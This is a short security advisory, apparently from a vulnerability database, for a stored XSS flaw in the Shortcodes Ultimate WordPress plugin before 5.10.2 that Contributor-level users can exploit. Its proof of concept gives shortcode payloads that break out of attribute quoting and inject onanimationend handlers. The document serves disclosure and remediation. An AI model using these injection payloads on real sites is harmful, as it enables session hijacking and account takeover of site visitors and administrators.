Shortcodes Ultimate < 5.10.2 - Contributor+ Stored XSS

The plugin allows users with Contributor roles to perform stored XSS via shortcode attributes. Note: the plugin is inconsistent in its handling of shortcode attributes; some do escape, most don’t, and there are even some attributes that are insecure by design (like [su_button]'s onclick attribute).

PoC

[su_accordion class=‘" style=“animation-name:twentytwentyone-close-button-transition” onanimationend="alert(1)’] [su_animate duration=‘1s;animation-name:twentytwentyone-close-button-transition;’ type=‘" onanimationend="alert(2)’] [su_audio width=‘1;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(3)//’ url=“a”] [su_box color=‘red;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(4)//’]